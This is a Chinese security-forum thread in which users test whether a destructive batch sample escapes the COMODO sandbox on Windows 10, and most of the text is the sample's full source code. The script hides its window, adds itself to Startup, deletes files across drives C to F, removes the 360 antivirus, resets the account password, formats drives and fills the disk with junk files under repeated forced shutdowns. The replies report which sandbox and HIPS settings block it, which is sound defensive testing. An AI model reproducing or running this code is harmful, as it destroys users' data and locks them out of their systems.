comodo沙盘被穿了

con16

就看誰有測試環境，用CIS去測比較準

毛豆掃不到，另一個就是要靠執行判斷
我這邊目前沒備份，若真的會穿沙，放沙盒可能也悲劇就先不測

lixihong10

1. [url=home.php?mod=space&uid=500624]@Shift[/url] /0
   
2. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
3. [url=home.php?mod=space&uid=22733]@color[/url] 17
   
4. @title Herobrine
   
5. if exist sbwj.txt goto second time
   
6. if "%1"=="h" goto first
   
7. start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
   
8. :first
   
9. copy Herobrine "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*�?
   
10. copy Herobrine "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
    
11. copy Herobrine "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    
12. shutdown -s -t 50
    
13. for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    
14. for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    
15. for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    
16. for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    
17. shutdown -s -t 45
    
18. copy Herobrine "C:\Documents and Settings
    
19. copy Herobrine "C:\Program Files
    
20. copy Herobrine "C:\WINDOWS
    
21. copy Herobrine "C:\
    
22. shutdown -s -t 40
    
23. Herobrine>>spcx.txt
    
24. start "" "spcx.txt"
    
25. start "" "spcx.txt"
    
26. start "" "spcx.txt"
    
27. start "" "spcx.txt"
    
28. start "" "spcx.txt"
    
29. start "" "spcx.txt"
    
30. start "" "spcx.txt"
    
31. start "" "spcx.txt"
    
32. start "" "spcx.txt"
    
33. start "" "spcx.txt"
    
34. start "" "spcx.txt"
    
35. start "" "spcx.txt"
    
36. start "" "spcx.txt"
    
37. start "" "spcx.txt"
    
38. start "" "spcx.txt"
    
39. start "" "spcx.txt"
    
40. start "" "spcx.txt"
    
41. start "" "spcx.txt"
    
42. start "" "spcx.txt"
    
43. start "" "spcx.txt"
    
44. start "" "spcx.txt"
    
45. start "" "spcx.txt"
    
46. start "" "spcx.txt"
    
47. start "" "spcx.txt"
    
48. start "" "spcx.txt"
    
49. start "" "spcx.txt"
    
50. start "" "spcx.txt"
    
51. start "" "spcx.txt"
    
52. start "" "spcx.txt"
    
53. start "" "spcx.txt"
    
54. start "" "spcx.txt"
    
55. start "" "spcx.txt"
    
56. start "" "spcx.txt"
    
57. start "" "spcx.txt"
    
58. start "" "spcx.txt"
    
59. start "" "spcx.txt"
    
60. del /f /s /q C:\Program Files\360
    
61. del /f /s /q C:\Documents and Settings\360
    
62. del /f /s /q C:\WINDOWS\360
    
63. del /f /s /q C:\360
    
64. shutdown -s -t 35
    
65. Echo Const strPassword = "s5d1a9x5sd4s"' >>1.vbs
    
66. echo Dim WshNetwork >>1.vbs
    
67. echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
    
68. echo Dim userName >>1.vbsecho userName = WshNetwork.userName&",user" >>1.vbs
    
69. echo Dim Domain >>1.vbsecho Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
    
70. echo Domain.SetPassword strPassword >>1.vbsecho Domain.SetInfo >>1.vbs
    
71. echo dim gj >>1.vbs
    
72. echo on error resume next >>1.vbs
    
73. echo dim WSHshellA >>1.vbs
    
74. echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
    
75. start “�?�?.vbs�?
    
76. start "" "C:\Documents and Settings"
    
77. sbwj>>sbwj.txt
    
78. shutdown -s -t 30
    
79. format d:/q/y
    
80. format e:/q/y
    
81. format f:/q/y
    
82. shutdown -s -t 20
    
83. start "" "C:\WINDOWS"
    
84. fsutil file createnew C:\1.1 4096000
    
85. fsutil file createnew C:\1.2 4096000
    
86. fsutil file createnew C:\1.3 4096000
    
87. fsutil file createnew C:\1.4 4096000
    
88. fsutil file createnew C:\1.5 4096000
    
89. fsutil file createnew C:\1.6 4096000
    
90. fsutil file createnew C:\1.7 4096000
    
91. fsutil file createnew C:\1.8 4096000
    
92. fsutil file createnew C:\1.9 4096000
    
93. start "" "C:\Program Files"
    
94. shutdown -s -t 17
    
95. fsutil file createnew C:\1.10 4096000
    
96. fsutil file createnew C:\1.11 4096000
    
97. fsutil file createnew C:\1.12 4096000
    
98. fsutil file createnew C:\1.13 4096000
    
99. fsutil file createnew C:\1.14 4096000
    
100. fsutil file createnew C:\1.15 4096000
     
101. fsutil file createnew C:\1.16 4096000
     
102. fsutil file createnew C:\1.17 4096000
     
103. fsutil file createnew C:\1.18 4096000
     
104. fsutil file createnew C:\1.19 4096000
     
105. fsutil file createnew C:\1.20 4096000
     
106. fsutil file createnew C:\1.21 4096000
     
107. fsutil file createnew C:\1.22 4096000
     
108. fsutil file createnew C:\1.23 4096000
     
109. start "" "C:\Program Files"
     
110. shutdown -s -t 15
     
111. fsutil file createnew C:\1.24 4096000
     
112. fsutil file createnew C:\1.25 4096000
     
113. fsutil file createnew C:\2.1 4096000
     
114. fsutil file createnew C:\2.2 4096000
     
115. fsutil file createnew C:\2.3 4096000
     
116. fsutil file createnew C:\2.4 4096000
     
117. fsutil file createnew C:\2.5 4096000
     
118. fsutil file createnew C:\2.6 4096000
     
119. fsutil file createnew C:\2.7 4096000
     
120. fsutil file createnew C:\2.8 4096000
     
121. fsutil file createnew C:\2.9 4096000
     
122. shutdown -s -t 10
     
123. fsutil file createnew C:\2.10 4096000
     
124. fsutil file createnew C:\2.11 4096000
     
125. fsutil file createnew C:\2.12 4096000
     
126. fsutil file createnew C:\2.13 4096000
     
127. fsutil file createnew C:\2.14 4096000
     
128. fsutil file createnew C:\2.15 4096000
     
129. fsutil file createnew C:\2.16 4096000
     
130. shutdown -s -t 5
     
131. fsutil file createnew C:\2.17 4096000
     
132. fsutil file createnew C:\2.18 4096000
     
133. fsutil file createnew C:\2.19 4096000
     
134. fsutil file createnew C:\2.20 4096000
     
135. shutdown -s -t 4
     
136. fsutil file createnew C:\2.21 4096000
     
137. fsutil file createnew C:\2.22 4096000
     
138. shutdown -s -t 3
     
139. fsutil file createnew C:\2.23 4096000
     
140. fsutil file createnew C:\2.24 4096000
     
141. fsutil file createnew C:\2.25 4096000
     
142. start "" "C:\WINDOWS"
     
143. shutdown -s -t 0
     
144. :second time
     
145. if "%1"=="h" goto second time
     
146. start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
     
147. shutdown -s -t 20
     
148. for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
     
149. for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
     
150. for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
     
151. for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
     
152. shutdown -s -t 15
     
153. del /f /s /q C:\Program Files\360
     
154. del /f /s /q C:\Documents and Settings\360
     
155. del /f /s /q C:\WINDOWS\360
     
156. del /f /s /q C:\360
     
157. shutdown -s -t 10
     
158. format d:/q/y
     
159. format e:/q/y
     
160. format f:/q/y
     
161. shutdown -s -t 0

复制代码

上面这里就是这个样本的源码。
我在win7 下面测试了 COMODO 8版本，拦截成功了。
然后在win10 下面测试了 COMODO 8 10 11 12四个版本，都失败了。
一开始我以为是 shutdown 这个程序有证书，我也试过吧证书全部删除还是侧漏。
现在的情况就是  你创建一个CMD文件，里面输入 shutdown 或者 logoff （注销命令） 在win10下面的COMODO 都不会拦截。

最后我测试了一下win10 安装5.12，发现沙盘开启必须要打开D+。
红框的两个模式能拦截，其实相当于D+规则模式下的沙盘了。
相当于8-12版本的COMODO 开启了HIPS 再开启了沙盘一样。
COMODO的沙盘再win10下面还是有很多不足的，想要安全一些还是用sandboxie毕竟现在还有人维护出BUG修复也快。

con16

所以是win10 有開沙盒和D+可以擋住嗎?

柯林

con16 发表于 2022-3-27 17:31
所以是win10 有開沙盒和D+可以擋住嗎?

是不是第一步添加到启动菜单没拦住，关机重启后，就废了？----毛豆的弊病好像就在这：只要成功添加启动项，重启后就被过了

con16

柯林 发表于 2022-3-27 17:53
是不是第一步添加到启动菜单没拦住，关机重启后，就废了？----毛豆的弊病好像就在这：只要成功添加启动项 ...

不知道，毛豆很久沒更新
這問題還是得回報

以前測毒有開D+，有時候是HIPS先提醒，不用到沙盒那邊

柯林

con16 发表于 2022-3-27 17:57
不知道，毛豆很久沒更新
這問題還是得回報

可能就是那个cmd加白了，然后添加了启动，重启后就废了！
有虚拟机尝试第一步就右键入沙看看，是不是还被过，如果过不了，可能就是白名单的锅！

柯林

con16 发表于 2022-3-27 17:31
所以是win10 有開沙盒和D+可以擋住嗎?

可以尝试--沙盘规则里加一条，开始菜单-启动项，这个路径，直接禁止运行，看看有没有用？

Cel3mt

经过测试，发现的问题是：

1、如果仅用自动沙盒入沙，默认规则被穿，也就是会注销系统。触发过程包含以下操作：（1）右键在沙盘中运行，（2）设置限制为部分限制（Partially Limited）。即默认的虚拟入沙和部分限制级别都会被穿。但是重启系统后，貌似没有异常。

2、如果仅用自动沙盒入沙，将沙盘限制级别改为Limited及以上，即Limited，Restricted和Untrusted这三者之一，不会被穿。

3、若启用了HIPS，弹窗拦截启动vbs文件这一步即可阻止后续动作。

测试录像：
链接: https://pan.baidu.com/s/14nj_-Cdc6BzA6m8rfUP8LQ?pwd=kybb
提取码: kybb

Cel3mt

con16 发表于 2022-3-27 17:31
所以是win10 有開沙盒和D+可以擋住嗎?

沙盒限制级别开到Limited及以上，才可以挡住。看18楼

Cel3mt

lixihong10 发表于 2022-3-27 16:55
上面这里就是这个样本的源码。
我在win7 下面测试了 COMODO 8版本，拦截成功了。
然后在win10 下面测试 ...

我这边的测试结果是 低权限级别 也是可以拦截的，只是部分限制拦不了。
Windows 10 x64
COMODO 12.2.2.8012